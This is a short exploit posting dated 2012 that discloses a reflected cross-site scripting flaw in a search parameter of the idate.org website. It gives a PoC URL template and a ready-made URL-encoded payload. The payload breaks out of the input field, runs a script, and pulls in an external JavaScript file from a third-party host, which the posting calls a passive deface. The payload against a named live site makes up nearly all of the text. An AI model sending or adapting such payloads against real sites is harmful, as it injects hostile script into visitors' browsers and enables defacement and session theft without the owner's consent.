Idate.org suffers from a cross site scripting vulnerability.
ffd9dc660290b21f5d21aec5c2d8182c5b3a3ba1fffae433e873a6e73168133d
+-------------------------------------------------------------------------+
# Exploit Title : Idate.org - website XSS (Cross Site Scripting) and
deface passive
# Author : Atmon3r
# Date : 16/04/2012
# Xss type : $_GET
# Perso : Chez Idate, On se touche la bibitte avec HADOPI ! xD
+-------------------------------------------------------------------------+
[+] POC:
http://www.idate.org/2009/pages/index.php?recherche={XSS}&x=15&y=10&all=recherche&idl=21
[+] DEMO:
http://www.idate.org/2009/pages/index.php?recherche=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cscript%20type=%22text/javascript%22%20src=%22http://vuln.xssed.net/thirdparty/scripts/ckers.org.js%22%3E%3C/script%3E&x=15&y=10&all=recherche&idl=21